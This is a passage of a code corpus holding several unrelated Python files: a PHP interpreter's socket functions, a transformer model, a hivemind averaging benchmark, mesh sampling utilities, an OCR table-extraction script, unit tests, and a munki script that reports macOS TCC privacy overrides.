aliases=['socket_set_timeout'])
def stream_set_timeout(interp, w_res, sec, mili=0):
""" Set timeout period on a stream"""
if mili:
sec += mili / 1000000.0
w_res.settimeout(sec)
return interp.space.w_True
@wrap(['interp', FileResourceArg(), int])
def stream_set_write_buffer(interp, w_res, buffer):
""" Sets write file buffering on the given stream"""
### mockup only
return interp.space.newint(0)
@wrap(['interp', FileResourceArg(), Optional(float), Optional('reference')])
def stream_socket_accept(interp, w_res, timeout=-1, w_ref_peer=None):
""" Accept a connection on a socket created by stream_socket_server"""
space = interp.space
fd, addr = w_res.accept()
w_res = W_SocketResource(space, None, -1, fd=fd)
if timeout == -1:
w_timeout = interp.config.get_ini_w('default_socket_timeout')
timeout = interp.space.float_w(w_timeout)
w_res.settimeout(timeout)
return w_res
def stream_socket_client():
""" Open Internet or Unix domain socket connection"""
raise NotImplementedError()
def stream_socket_enable_crypto():
""" Turns encryption on/off on an already connected socket"""
raise NotImplementedError()
@wrap(['interp', FileResourceArg(), bool])
def stream_socket_get_name(interp, w_res, remote):
""" Retrieve the name of the local or remote sockets"""
return w_res.get_name(remote)
def stream_socket_pair():
""" Creates a pair of connected, indistinguishable socket streams"""
raise NotImplementedError()
def stream_socket_recvfrom():
""" Receives data from a socket, connected or not"""
raise NotImplementedError()
def stream_socket_sendto():
""" Sends a message to a socket, whether it is connected or not"""
raise NotImplementedError()
@wrap(['interp', str, Optional('reference'), Optional('reference'),
Optional(int), Optional(StreamContextArg(None))])
def stream_socket_server(interp, local_socket, w_ref_errno=None,
w_ref_errstr=None, flags=12, w_ctx=None):
""" Create an Internet or Unix domain server socket
('STREAM_SERVER_BIND', 4),
('STREAM_SERVER_LISTEN', 8),
"""
r = urlsplit(local_socket)
space = interp.space
bind = flags & 4 != 0
listen = flags & 8 != 0
w_res = W_SocketResource(space, r.host, r.port, r.scheme)
if bind:
w_res.bind()
if listen:
w_res.listen()
return w_res
# import pdb; pdb.set_trace()
def stream_socket_shutdown():
""" Shutdown a full-duplex connection"""
raise NotImplementedError()
def stream_supports_lock():
""" Tells whether the stream supports locking."""
raise NotImplementedError()
def stream_wrapper_register():
""" Register a URL wrapper implemented as a PHP class"""
raise NotImplementedError()
def stream_wrapper_restore():
""" Restores a previously unregistered built-in wrapper"""
raise NotImplementedError()
def stream_wrapper_unregister():
""" Unregister a URL wrapper"""
raise NotImplementedError()
|
413823
|
import torch
from fast_transformers.builders import TransformerEncoderBuilder, RecurrentEncoderBuilder
from fast_transformers.masking import TriangularCausalMask
from fit.transformers.PositionalEncoding2D import PositionalEncoding2D
class SResTransformerTrain(torch.nn.Module):
def __init__(self,
d_model,
coords, flatten_order,
attention_type="linear",
n_layers=4,
n_heads=4,
d_query=32,
dropout=0.1,
attention_dropout=0.1):
super(SResTransformerTrain, self).__init__()
self.fourier_coefficient_embedding = torch.nn.Linear(2, d_model // 2)
self.pos_embedding = PositionalEncoding2D(
d_model // 2,
coords=coords,
flatten_order=flatten_order,
persistent=False
)
self.encoder = TransformerEncoderBuilder.from_kwargs(
attention_type=attention_type,
n_layers=n_layers,
n_heads=n_heads,
feed_forward_dimensions=n_heads * d_query * 4,
query_dimensions=d_query,
value_dimensions=d_query,
dropout=dropout,
attention_dropout=attention_dropout
).get()
self.predictor_amp = torch.nn.Linear(
n_heads * d_query,
1
)
self.predictor_phase = torch.nn.Linear(
n_heads * d_query,
1
)
def forward(self, x):
x = self.fourier_coefficient_embedding(x)
x = self.pos_embedding(x)
triangular_mask = TriangularCausalMask(x.shape[1], device=x.device)
y_hat = self.encoder(x, attn_mask=triangular_mask)
y_amp = self.predictor_amp(y_hat)
y_phase = torch.tanh(self.predictor_phase(y_hat))
return torch.cat([y_amp, y_phase], dim=-1)
class SResTransformerPredict(torch.nn.Module):
def __init__(self, d_model, coords, flatten_order,
attention_type="full", n_layers=4, n_heads=4,
d_query=32, dropout=0.1,
attention_dropout=0.1):
super(SResTransformerPredict, self).__init__()
self.fourier_coefficient_embedding = torch.nn.Linear(2, d_model // 2)
self.pos_embedding = PositionalEncoding2D(
d_model // 2,
coords=coords,
flatten_order=flatten_order,
persistent=False
)
self.encoder = RecurrentEncoderBuilder.from_kwargs(
attention_type=attention_type,
n_layers=n_layers,
n_heads=n_heads,
feed_forward_dimensions=n_heads * d_query * 4,
query_dimensions=d_query,
value_dimensions=d_query,
dropout=dropout,
attention_dropout=attention_dropout
).get()
self.predictor_amp = torch.nn.Linear(
n_heads * d_query,
1
)
self.predictor_phase = torch.nn.Linear(
n_heads * d_query,
1
)
def forward(self, x, i=0, memory=None):
x = x.view(x.shape[0], -1)
x = self.fourier_coefficient_embedding(x)
x = self.pos_embedding.forward_i(x, i)
y_hat, memory = self.encoder(x, memory)
y_amp = self.predictor_amp(y_hat)
y_phase = torch.tanh(self.predictor_phase(y_hat))
return torch.cat([y_amp, y_phase], dim=-1), memory
|
413831
|
import argparse
import math
import threading
import time
import torch
import hivemind
from hivemind.proto import runtime_pb2
from hivemind.utils.limits import increase_file_limit
from hivemind.utils.logging import get_logger, use_hivemind_log_handler
from hivemind.utils.networking import LOCALHOST
use_hivemind_log_handler("in_root_logger")
logger = get_logger(__name__)
def sample_tensors(hid_size, num_layers):
tensors = []
for i in range(num_layers):
tensors.append(torch.randn(hid_size, 3 * hid_size))
tensors.append(torch.randn(3 * hid_size))
tensors.append(torch.randn(3 * hid_size))
tensors.append(torch.randn(hid_size, hid_size))
tensors.append(torch.ones(hid_size))
tensors.append(torch.zeros(hid_size))
tensors.append(torch.randn(hid_size, 4 * hid_size))
tensors.append(torch.randn(4 * hid_size))
tensors.append(torch.ones(4 * hid_size))
tensors.append(torch.randn(2, hid_size, hid_size, 2))
tensors.append(torch.randn(hid_size))
tensors.append(torch.randn(hid_size))
tensors.append(torch.randn(hid_size))
return tuple(tensors)
def benchmark_averaging(
num_peers: int,
target_group_size: int,
num_rounds: int,
averaging_expiration: float,
request_timeout: float,
round_timeout: float,
hid_size: int,
num_layers: int,
spawn_dtime: float,
):
dht_root = hivemind.DHT(start=True)
initial_peers = dht_root.get_visible_maddrs()
num_groups = 2 ** int(round(math.log2(num_peers / target_group_size)))
nbits = int(round(math.log2(num_groups)))
peer_tensors = [sample_tensors(hid_size, num_layers) for _ in range(num_peers)]
processes = {dht_root}
lock_stats = threading.Lock()
successful_steps = total_steps = 0
def run_averager(index):
nonlocal successful_steps, total_steps, lock_stats
dht = hivemind.DHT(initial_peers=initial_peers, start=True)
initial_bits = bin(index % num_groups)[2:].rjust(nbits, "0")
averager = hivemind.averaging.DecentralizedAverager(
peer_tensors[index],
dht,
prefix="my_tensor",
initial_group_bits=initial_bits,
compression_type=runtime_pb2.CompressionType.FLOAT16,
target_group_size=target_group_size,
averaging_expiration=averaging_expiration,
request_timeout=request_timeout,
start=True,
)
processes.update({dht, averager})
logger.info(
f"Averager {index}: started with peer id {averager.peer_id}, group_bits: {averager.get_group_bits()}"
)
for step in range(num_rounds):
try:
success = averager.step(timeout=round_timeout) is not None
except:
success = False
with lock_stats:
successful_steps += int(success)
total_steps += 1
logger.info(f"Averager {index}: {'finished' if success else 'failed'} step #{step}")
logger.info(f"Averager {index}: done.")
threads = []
for i in range(num_peers):
thread = threading.Thread(target=run_averager, args=[i])
threads.append(thread)
thread.start()
time.sleep(spawn_dtime)
t = time.time()
for thread in threads:
thread.join()
logger.info(f"Benchmark finished in {time.time() - t:.3f} seconds.")
logger.info(f"Success rate: {successful_steps / total_steps} ({successful_steps} out of {total_steps} attempts)")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--num_peers", type=int, default=16, required=False)
parser.add_argument("--target_group_size", type=int, default=4, required=False)
parser.add_argument("--num_rounds", type=int, default=5, required=False)
parser.add_argument("--hid_size", type=int, default=256, required=False)
parser.add_argument("--num_layers", type=int, default=3, required=False)
parser.add_argument("--averaging_expiration", type=float, default=5, required=False)
parser.add_argument("--round_timeout", type=float, default=15, required=False)
parser.add_argument("--request_timeout", type=float, default=1, required=False)
parser.add_argument("--spawn_dtime", type=float, default=0.1, required=False)
parser.add_argument("--increase_file_limit", action="store_true")
args = vars(parser.parse_args())
if args.pop("increase_file_limit", False):
increase_file_limit()
benchmark_averaging(**args)
|
413855
|
import torch
import numpy as np
import pickle
from configs.data_config import number_pnts_on_template
# Initialize the weights of the network for convolutional and batchnorm layers
def weights_init(m):
classname = m.__class__.__name__
if classname.find('Conv') != -1:
m.weight.data.normal_(0.0, 0.02)
elif classname.find('BatchNorm') != -1:
m.weight.data.normal_(1.0, 0.02)
m.bias.data.fill_(0)
# load sphere faces and points
def load_template(number):
file_name = './data/sphere%d.pkl' % (number)
with open(file_name, 'rb') as file:
sphere_obj = pickle.load(file)
sphere_points_normals = torch.from_numpy(sphere_obj['v']).float()
sphere_faces = torch.from_numpy(sphere_obj['f']).long()
sphere_adjacency = torch.from_numpy(sphere_obj['adjacency'].todense()).long()
sphere_edges = torch.from_numpy(sphere_obj['edges']).long()
sphere_edge2face = torch.from_numpy(sphere_obj['edge2face'].todense()).type(torch.uint8)
return sphere_points_normals, sphere_faces, sphere_adjacency, sphere_edges, sphere_edge2face
sphere_points_normals, sphere_faces, sphere_adjacency, sphere_edges, sphere_edge2face = load_template(number_pnts_on_template)
def sample_points_on_edges(points, edges, quantity = 1, mode = 'train'):
n_batch = edges.shape[0]
n_edges = edges.shape[1]
if mode == 'train':
        # if the sampling rate is larger than 1, we randomly pick points on edges.
weights = np.diff(np.sort(np.vstack(
[np.zeros((1, n_edges * quantity)), np.random.uniform(0, 1, size=(1, n_edges * quantity)),
np.ones((1, n_edges * quantity))]), axis=0), axis=0)
else:
        # if in test mode, we pick the midpoint of each edge.
weights = 0.5 * np.ones((2, n_edges * quantity))
weights = weights.reshape([2, quantity, n_edges])
weights = torch.from_numpy(weights).float().to(points.device)
weights = weights.transpose(1, 2)
weights = weights.transpose(0, 1).contiguous()
weights = weights.expand(n_batch, n_edges, 2, quantity).contiguous()
weights = weights.view(n_batch * n_edges, 2, quantity)
left_nodes = torch.gather(points.transpose(1, 2), 1,
(edges[:, :, 0] - 1).unsqueeze(-1).expand(edges.size(0), edges.size(1), 3))
right_nodes = torch.gather(points.transpose(1, 2), 1,
(edges[:, :, 1] - 1).unsqueeze(-1).expand(edges.size(0), edges.size(1), 3))
edge_points = torch.cat([left_nodes.unsqueeze(-1), right_nodes.unsqueeze(-1)], -1).view(n_batch*n_edges, 3, 2)
new_point_set = torch.bmm(edge_points, weights).contiguous()
new_point_set = new_point_set.view(n_batch, n_edges, 3, quantity)
new_point_set = new_point_set.transpose(2, 3).contiguous()
new_point_set = new_point_set.view(n_batch, n_edges * quantity, 3)
new_point_set = new_point_set.transpose(1, 2).contiguous()
return new_point_set
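# Hedged usage sketch (not part of the original module; importing this file
# still requires the sphere pickle and configs loaded above). Random points
# and 1-based edge indices are used only to illustrate the expected shapes.
if __name__ == "__main__":
    n_batch, n_points, n_edges = 2, 100, 50
    demo_points = torch.randn(n_batch, 3, n_points)
    demo_edges = torch.randint(1, n_points + 1, (n_batch, n_edges, 2))
    sampled = sample_points_on_edges(demo_points, demo_edges, quantity=1, mode='test')
    print(sampled.shape)  # torch.Size([2, 3, 50])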
|
413857
|
import re
class MessageTranslator:
messages = {}
def __init__(self):
self.compiled_messages = {m: re.compile(m) for m in self.messages}
def translate_messages(self, messages):
return [self.translate_message(m) for m in messages]
def translate_message(self, message):
for target_message, pattern in self.compiled_messages.items():
pattern_found = pattern.search(message)
if pattern_found:
groups = pattern_found.groupdict()
return self.messages[target_message].format(**groups)
return message
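# Hedged usage sketch (not part of the original module): `messages` maps a
# regex with named groups to a format string filled from those groups; the
# subclass and patterns below are illustrative only.
if __name__ == "__main__":
    class DiskMessageTranslator(MessageTranslator):
        messages = {
            r"disk (?P<disk>\w+) is at (?P<pct>\d+)%": "Disk {disk} usage: {pct}%",
        }

    translator = DiskMessageTranslator()
    print(translator.translate_message("disk sda1 is at 93% capacity"))  # Disk sda1 usage: 93%
    print(translator.translate_message("unrelated line"))  # returned unchanged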
|
413863
|
import unittest
from uuid import (
uuid4,
)
from minos.aggregate import (
Action,
Event,
FieldDiff,
FieldDiffContainer,
)
from minos.common import (
current_datetime,
)
from tests.utils import (
AggregateTestCase,
Car,
)
class TestRootEntityDifferences(AggregateTestCase):
async def asyncSetUp(self) -> None:
self.uuid = uuid4()
self.uuid_another = uuid4()
self.initial_datetime = current_datetime()
self.final_datetime = current_datetime()
self.another_datetime = current_datetime()
self.initial = Car(
3, "blue", uuid=self.uuid, version=1, created_at=self.initial_datetime, updated_at=self.initial_datetime
)
self.final = Car(
5, "yellow", uuid=self.uuid, version=3, created_at=self.initial_datetime, updated_at=self.final_datetime
)
self.another = Car(
3,
"blue",
uuid=self.uuid_another,
created_at=self.another_datetime,
updated_at=self.another_datetime,
version=1,
)
def test_diff(self):
expected = Event(
uuid=self.uuid,
name=Car.classname,
version=3,
action=Action.UPDATE,
created_at=self.final_datetime,
fields_diff=FieldDiffContainer([FieldDiff("doors", int, 5), FieldDiff("color", str, "yellow")]),
)
observed = self.final.diff(self.initial)
self.assertEqual(expected, observed)
def test_apply_diff(self):
diff = Event(
uuid=self.uuid,
name=Car.classname,
version=3,
action=Action.UPDATE,
created_at=self.final_datetime,
fields_diff=FieldDiffContainer([FieldDiff("doors", int, 5), FieldDiff("color", str, "yellow")]),
)
self.initial.apply_diff(diff)
self.assertEqual(self.final, self.initial)
def test_apply_diff_raises(self):
diff = Event(
uuid=self.uuid_another,
name=Car.classname,
version=3,
action=Action.UPDATE,
created_at=current_datetime(),
fields_diff=FieldDiffContainer([FieldDiff("doors", int, 5), FieldDiff("color", str, "yellow")]),
)
with self.assertRaises(ValueError):
self.initial.apply_diff(diff)
if __name__ == "__main__":
unittest.main()
|
413920
|
import os
import cv2
import imutils
import numpy as np
import matplotlib.pyplot as plt
import tesserocr as tr
from PIL import Image
class ImgProcess:
def __init__(self, filepath):
self.filepath = filepath
self.filename = os.path.basename(filepath)
self.filename_without_ext = os.path.splitext(self.filename)[0]
self.img = None
self.img_pre_processed = None
data_folder_name = "imgs"
self.img_pre_processed_filename = os.path.join(data_folder_name, "pre", f"{self.filename_without_ext}.png")
self.img_region_dir = os.path.join(data_folder_name, "regions")
self.img_region_list = []
self.img_region_marked_dir = os.path.join(data_folder_name, "region_marked")
self.img_table_lined_list = []
self.img_table_lined_dir = os.path.join(data_folder_name, "table_line")
self.img_item_dir = os.path.join(data_folder_name, "items")
self.img_item_list = []
self.img_region_item_marked_dir = os.path.join(data_folder_name, "item_marked")
self.img_item_sub_dir = os.path.join(data_folder_name, "items_sub")
self.img_item_sub_marked_dir = os.path.join(data_folder_name, "items_sub_marked")
self.img_ocr_marked_dir = os.path.join(data_folder_name, "img_ocr_marked")
self.img_regions_ocr_marked_dir = os.path.join(data_folder_name, "img_regions_ocr_marked")
def load_source(self):
self.img = cv2.imread(self.filepath)
def pre_process(self, thresh_mode):
# get rid of the color
pre = cv2.cvtColor(self.img, cv2.COLOR_BGR2GRAY)
# Otsu threshold
pre = cv2.threshold(pre, 100, 255, thresh_mode | cv2.THRESH_OTSU)[1]
pre = ~pre
cv2.imwrite(self.img_pre_processed_filename, pre)
self.img_pre_processed = pre
def get_regions(self, save_in_file=False):
self.img_region_list.clear()
low_threshold = 50
high_threshold = 150
edges = cv2.Canny(self.img_pre_processed, low_threshold, high_threshold)
img_region_marked = np.copy(self.img)
img_region_marked_view = np.copy(self.img)
contours, hierarchy = cv2.findContours(edges, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
hull_list = []
min_region = self.img.size // 100
for cnt in range(len(contours)):
epsilon = 0.01 * cv2.arcLength(contours[cnt], True)
approx = cv2.approxPolyDP(contours[cnt], epsilon, True)
corners = len(approx)
if corners in range(4, 10):
area = cv2.contourArea(contours[cnt])
if area > min_region:
hull = cv2.convexHull(contours[cnt])
hull_list.append(hull)
for cnt in range(len(hull_list)):
cv2.drawContours(img_region_marked, hull_list, cnt, (0, 0, 0), 5)
cv2.drawContours(img_region_marked_view, hull_list, cnt, (0, 0, 255), 10)
x, y, w, h = cv2.boundingRect(hull_list[cnt])
region = img_region_marked[y:y + h, x:x + w]
if region.shape[1] < 1000 or region.shape[0] < 1000:
                    scale_percent = 100  # percent of original size
                    # scale up whichever dimension is below 1000 px
                    if region.shape[1] < 1000:
                        scale_percent = 1000 // region.shape[1] * 100
                    else:
                        scale_percent = 1000 // region.shape[0] * 100
width = int(region.shape[1] * scale_percent / 100)
height = int(region.shape[0] * scale_percent / 100)
if width > 0 and height > 0:
dim = (width, height)
# resize image
resized = cv2.resize(region, dim, interpolation=cv2.INTER_AREA)
self.img_region_list.append(np.copy(resized))
else:
self.img_region_list.append(np.copy(region))
if save_in_file:
# save regions file
for i in range(len(self.img_region_list)):
cv2.imwrite(os.path.join(self.img_region_dir, f"{self.filename_without_ext}_{i}.png"),
self.img_region_list[i])
# save region marked file
path = os.path.join(self.img_region_marked_dir, f"{self.filename_without_ext}.png")
cv2.imwrite(path, img_region_marked_view)
plt.imshow(img_region_marked_view, cmap='gray')
plt.show()
return len(self.img_region_list)
def get_table(self):
def pre_process_region(region):
# get rid of the color
pre = cv2.cvtColor(region, cv2.COLOR_BGR2GRAY)
# Otsu threshold
pre = cv2.threshold(pre, 240, 255, cv2.THRESH_BINARY)[1]
pre = ~pre
return pre
for img_region in self.img_region_list:
pre = pre_process_region(img_region)
plt.imshow(pre)
plt.show()
ver_kernel_len = np.array(img_region).shape[0] // 30
hor_kernel_len = np.array(img_region).shape[1] // 20
# Defining a vertical kernel to detect all vertical lines of image
ver_kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (1, ver_kernel_len))
# Defining a horizontal kernel to detect all horizontal lines of image
hor_kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (hor_kernel_len, 1))
# A kernel of 2x1
kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (2, 2))
# Use vertical kernel to detect and save the vertical lines in a jpg
image_1 = cv2.erode(pre, ver_kernel, iterations=3)
vertical_lines = cv2.dilate(image_1, ver_kernel, iterations=3)
# Use horizontal kernel to detect and save the horizontal lines in a jpg
image_2 = cv2.erode(pre, hor_kernel, iterations=3)
horizontal_lines = cv2.dilate(image_2, hor_kernel, iterations=3)
# Combine horizontal and vertical lines in a new third image, with both having same weight.
img_vh = cv2.addWeighted(vertical_lines, 0.5, horizontal_lines, 0.5, 0.0)
# Eroding and thesholding the image
img_vh = cv2.erode(~img_vh, kernel, iterations=2)
thresh, img_vh = cv2.threshold(img_vh, 128, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)
# connect broken line
kernel = np.ones((1, 5), np.uint8)
erosion = cv2.erode(img_vh, kernel, iterations=10)
dilate = cv2.dilate(erosion, kernel, iterations=10)
# kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (4, 1))
# morph_img = cv2.morphologyEx(dilate, cv2.MORPH_CLOSE, kernel)
result = dilate
self.img_table_lined_list.append(result)
plt.imshow(result, cmap='gray')
plt.show()
# save table line file
for i in range(len(self.img_table_lined_list)):
cv2.imwrite(os.path.join(self.img_table_lined_dir, f"{self.filename_without_ext}_{i}.png"),
self.img_table_lined_list[i])
def crop_by_table_line(self):
for table_img_index in range(len(self.img_table_lined_list)):
img_table_lined = self.img_table_lined_list[table_img_index]
low_threshold = 100
high_threshold = 255
img_region_marked = np.copy(self.img_region_list[table_img_index])
edges = cv2.Canny(~img_table_lined, low_threshold, high_threshold)
contours, hierarchy = cv2.findContours(edges, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_TC89_L1)
for cnt in range(len(contours)):
                # Contour approximation
epsilon = 0.01 * cv2.arcLength(contours[cnt], True)
approx = cv2.approxPolyDP(contours[cnt], epsilon, True)
corners = len(approx)
# if corners in range(4, 10):
ar = cv2.contourArea(contours[cnt])
if ar > (img_table_lined.size // 200):
cv2.drawContours(img_region_marked, contours, cnt, (255, 0, 0), 5)
hull = cv2.convexHull(contours[cnt])
x, y, w, h = cv2.boundingRect(hull)
c = self.img_region_list[table_img_index][y:y + h, x:x + w]
self.img_item_list.append(c)
self.img_item_list.reverse()
path = os.path.join(self.img_region_item_marked_dir,
f"{self.filename_without_ext}_{table_img_index}.png")
plt.imshow(img_region_marked, cmap='gray')
plt.show()
cv2.imwrite(path, img_region_marked)
for index in range(len(self.img_item_list)):
item = self.img_item_list[index]
path = os.path.join(self.img_item_dir, f"{self.filename_without_ext}_{index}.png")
cv2.imwrite(path, item)
def ocr(self):
s = ""
# item_text_list = []
# for i in range(len(self.img_item_list)):
# item = self.img_item_list[i]
# out = pytesseract.image_to_string(item)
# out_t = out.strip()
# if len(out_t) != 0:
# item_text_list.append(out_t)
# # s = s + f"\nitem {i}:\n" + out_t
# s = s + f"\n" + out_t
item_text_list = []
sub_list = []
with tr.PyTessBaseAPI(path='C:\\Program Files\\Tesseract-OCR\\tessdata\\', lang='eng') as api:
api.SetPageSegMode(tr.PSM.SPARSE_TEXT)
for i in range(len(self.img_item_list)):
item = self.img_item_list[i]
pil_img = Image.fromarray(cv2.cvtColor(item, cv2.COLOR_BGR2RGB))
api.SetImage(pil_img)
item_sub_marked = np.copy(item)
boxes = api.GetComponentImages(tr.RIL.PARA, True)
# get text
# text = api.GetUTF8Text()
# print(text)
# iterate over returned list, draw rectangles
for (im, box, _, _) in boxes:
x, y, w, h = box['x'], box['y'], box['w'], box['h']
cv2.rectangle(item_sub_marked, (x, y), (x + w, y + h), color=(0, 0, 255))
path = os.path.join(self.img_item_sub_marked_dir, f"{self.filename_without_ext}_{i}.png")
cv2.imwrite(path, item_sub_marked)
for i in range(len(sub_list)):
path = os.path.join(self.img_item_sub_dir, f"{self.filename_without_ext}_{i}.png")
cv2.imwrite(path, sub_list[i])
print(f"{self.filename_without_ext}============")
print(s)
print("============")
def ocr_whole(self):
with tr.PyTessBaseAPI(path='C:\\Program Files\\Tesseract-OCR\\tessdata\\', lang='eng') as api:
api.SetPageSegMode(tr.PSM.AUTO_OSD)
item = self.img
pil_img = Image.fromarray(cv2.cvtColor(item, cv2.COLOR_BGR2RGB))
api.SetImage(pil_img)
item_sub_marked = np.copy(item)
boxes = api.GetComponentImages(tr.RIL.BLOCK, True)
# get text
# text = api.GetUTF8Text()
# print(text)
# iterate over returned list, draw rectangles
for (im, box, _, _) in boxes:
x, y, w, h = box['x'], box['y'], box['w'], box['h']
cv2.rectangle(item_sub_marked, (x, y), (x + w, y + h), color=(0, 0, 255))
# out = pytesseract.image_to_string(~resized_afterd, lang='eng', config='--psm 3')
# out_t = out.strip()
# if len(out_t) != 0:
# item_text_list.append(out_t)
# # s = s + f"\nitem {i}:\n" + out_t
# s = s + f"\n" + out_t
path = os.path.join(self.img_ocr_marked_dir, f"{self.filename_without_ext}.png")
cv2.imwrite(path, item_sub_marked)
plt.show()
def ocr_regions(self):
def pre_process_region(region):
# get rid of the color
pre = cv2.cvtColor(region, cv2.COLOR_BGR2GRAY)
# Otsu threshold
# pre = cv2.threshold(pre, 200, 255, cv2.THRESH_BINARY)[1]
return pre
with tr.PyTessBaseAPI(
path='C:\\Program Files\\Tesseract-OCR\\tessdata\\', lang='eng', psm=tr.PSM.AUTO,
oem=tr.OEM.LSTM_ONLY) as api:
api.SetPageSegMode(tr.PSM.SINGLE_COLUMN)
for i in range(len(self.img_region_list)):
item = pre_process_region(self.img_region_list[i])
pil_img = Image.fromarray(item)
api.SetImage(pil_img)
item_sub_marked = np.copy(item)
boxes = api.GetComponentImages(tr.RIL.BLOCK, True)
# get text
text = api.GetUTF8Text()
print(text)
# iterate over returned list, draw rectangles
for (im, box, _, _) in boxes:
x, y, w, h = box['x'], box['y'], box['w'], box['h']
cv2.rectangle(item_sub_marked, (x, y), (x + w, y + h), color=(0, 0, 255))
path = os.path.join(self.img_regions_ocr_marked_dir, f"{self.filename_without_ext}_{i}.png")
cv2.imwrite(path, item_sub_marked)
if __name__ == "__main__":
source_dir = os.path.join("imgs", "source")
dir_list = os.listdir(source_dir)
thresh_modes = [cv2.THRESH_BINARY_INV, cv2.THRESH_BINARY, cv2.THRESH_TRUNC]
for cur_file in dir_list:
source_file = os.path.join(source_dir, cur_file)
in_file = source_file
img = ImgProcess(source_file)
img.load_source()
img.ocr_whole()
region_count = 0
max_index = -1
max_region_count = 0
for thresh_mode_index in range(len(thresh_modes)):
thresh_mode = thresh_modes[thresh_mode_index]
img.pre_process(thresh_mode)
region_count = img.get_regions()
if region_count > max_region_count:
max_index = thresh_mode_index
max_region_count = region_count
if max_region_count == 0:
continue
img.pre_process(thresh_modes[max_index])
img.get_regions(True)
img.ocr_regions()
img.get_table()
img.crop_by_table_line()
img.ocr()
print(f"Done {cur_file}")
|
413965
|
import os
try:
from munkicon import plist
from munkicon import worker
except ImportError:
from .munkicon import plist
from .munkicon import worker
# Keys: 'tcc_accessibility'
# 'tcc_address_book'
# 'tcc_apple_events'
# 'tcc_calendar'
# 'tcc_camera'
# 'tcc_file_provider_presence'
# 'tcc_listen_event'
# 'tcc_media_library'
# 'tcc_microphone'
# 'tcc_photos'
# 'tcc_post_event'
# 'tcc_reminders'
# 'tcc_screen_capture'
# 'tcc_speech_recognition'
# 'tcc_all_files'
# 'tcc_desktop_folder'
# 'tcc_documents_folder'
# 'tcc_downloads_folder'
# 'tcc_network_volumes'
# 'tcc_removable_volumes'
# 'tcc_sys_admin_files'
class PPPCPConditions(object):
"""PPPCP Profiles"""
def __init__(self):
self.conditions = self._process()
def _parse_item(self, obj):
"""Parse PPPCP object."""
result = {'ae_identifier': obj.get('AEReceiverIdentifier', None),
'identifier': obj.get('Identifier', None),
'auth': None}
        # macOS 11+ replaces the bool 'Allowed' with 'Authorization', which has
        # three values: 'Allow', 'Deny', 'AllowStandardUserToSetSystemService'.
        # Look for 'Authorization' first; if only the bool 'Allowed' is present,
        # map it back to 'Allow' (True) or 'Deny' (False).
try:
_auth = obj['Authorization']
except KeyError:
_auth = 'Allow' if obj['Allowed'] else 'Deny'
# Make the 'AllowStandardUserToSetSystemService' a little easier to type
# in munki conditionals statements.
if _auth == 'AllowStandardUserToSetSystemService':
_auth = 'allow_standard_user'
result['auth'] = _auth.lower()
return result
def _pppcp_overrides(self):
"""Returns PPPCP identifiers from MDM overrides."""
result = dict()
# TCC Map
_ktcc_map = {'kTCCServiceAccessibility': 'tcc_accessibility',
'kTCCServiceAddressBook': 'tcc_address_book',
'kTCCServiceAppleEvents': 'tcc_apple_events',
'kTCCServiceCalendar': 'tcc_calendar',
'kTCCServiceCamera': 'tcc_camera',
'kTCCServiceFileProviderPresence': 'tcc_file_provider_presence',
'kTCCServiceListenEvent': 'tcc_listen_event',
'kTCCServiceMediaLibrary': 'tcc_media_library',
'kTCCServiceMicrophone': 'tcc_microphone',
'kTCCServicePhotos': 'tcc_photos',
'kTCCServicePostEvent': 'tcc_post_event',
'kTCCServiceReminders': 'tcc_reminders',
'kTCCServiceScreenCapture': 'tcc_screen_capture',
'kTCCServiceSpeechRecognition': 'tcc_speech_recognition',
'kTCCServiceSystemPolicyAllFiles': 'tcc_all_files',
'kTCCServiceSystemPolicyDesktopFolder': 'tcc_desktop_folder',
'kTCCServiceSystemPolicyDocumentsFolder': 'tcc_documents_folder',
'kTCCServiceSystemPolicyDownloadsFolder': 'tcc_downloads_folder',
'kTCCServiceSystemPolicyNetworkVolumes': 'tcc_network_volumes',
'kTCCServiceSystemPolicyRemovableVolumes': 'tcc_removable_volumes',
'kTCCServiceSystemPolicySysAdminFiles': 'tcc_sys_admin_files'}
# Generate the results keys to return.
for _k, _v in _ktcc_map.items():
result[_v] = list()
_mdmoverrides = '/Library/Application Support/com.apple.TCC/MDMOverrides.plist'
if os.path.exists(_mdmoverrides):
_overrides = plist.readPlist(path=_mdmoverrides)
if _overrides:
for _item, _payload in _overrides.items():
for _k, _v in _payload.items():
_tcc_type = _ktcc_map[_k]
# Apple Events has a deeper nesting structure.
if _k == 'kTCCServiceAppleEvents':
# There might be multiple dictionaries in the value for 'kTCCServiceAppleEvents'
# I really hope not :|
for _id, _vals in _v.items():
_entry = self._parse_item(_vals)
_ae_id = _entry.get('ae_identifier', None)
_auth = _entry.get('auth', None)
_id = _entry.get('identifier', None)
# Only add if there's an identifier
if _ae_id and _auth and _id:
_tcc_str = '{},{},{}'.format(_auth, _id, _ae_id)
if _tcc_str not in result[_tcc_type]:
result[_tcc_type].append(_tcc_str)
else:
_entry = self._parse_item(_v)
_ae_id = _entry.get('ae_identifier', None)
_auth = _entry.get('auth', None)
_id = _entry.get('identifier', None)
# Only add if there's an identifier
if _auth and _id:
_tcc_str = '{},{}'.format(_auth, _id)
if _tcc_str not in result[_tcc_type]:
result[_tcc_type].append(_tcc_str)
return result
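    # A sketch of the returned structure (identifiers are hypothetical):
    #   {'tcc_screen_capture': ['allow,com.example.app'],
    #    'tcc_apple_events': ['allow,com.example.app,com.example.receiver'],
    #    ...}
    # Every key from _ktcc_map is present; services with no override map to an
    # empty list.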
def _process(self):
"""Process all conditions and generate the condition dictionary."""
result = dict()
result.update(self._pppcp_overrides())
return result
def runner(dest):
pppcp = PPPCPConditions()
mc = worker.MunkiConWorker(conditions_file=dest, log_src=__file__)
mc.write(conditions=pppcp.conditions)
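# Example invocation (the destination path here is hypothetical):
#   runner('/usr/local/munki/conditions/pppcp_conditions.plist')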
|
413981
|
from collections import namedtuple
import camus
from unittest import mock
from pytest import raises
IdRecord = namedtuple("IdRecord", "id")
def check_id(i, row):
assert row.id == i
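# Minimal stand-in for the RDS Data API client that camus.Database receives via
# 'conn': begin/rollback/execute succeed, while commit_transaction always raises
# so the transaction error path can be exercised in TestTransaction below.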
class MockAurora:
def begin_transaction(self, secretArn, resourceArn, database):
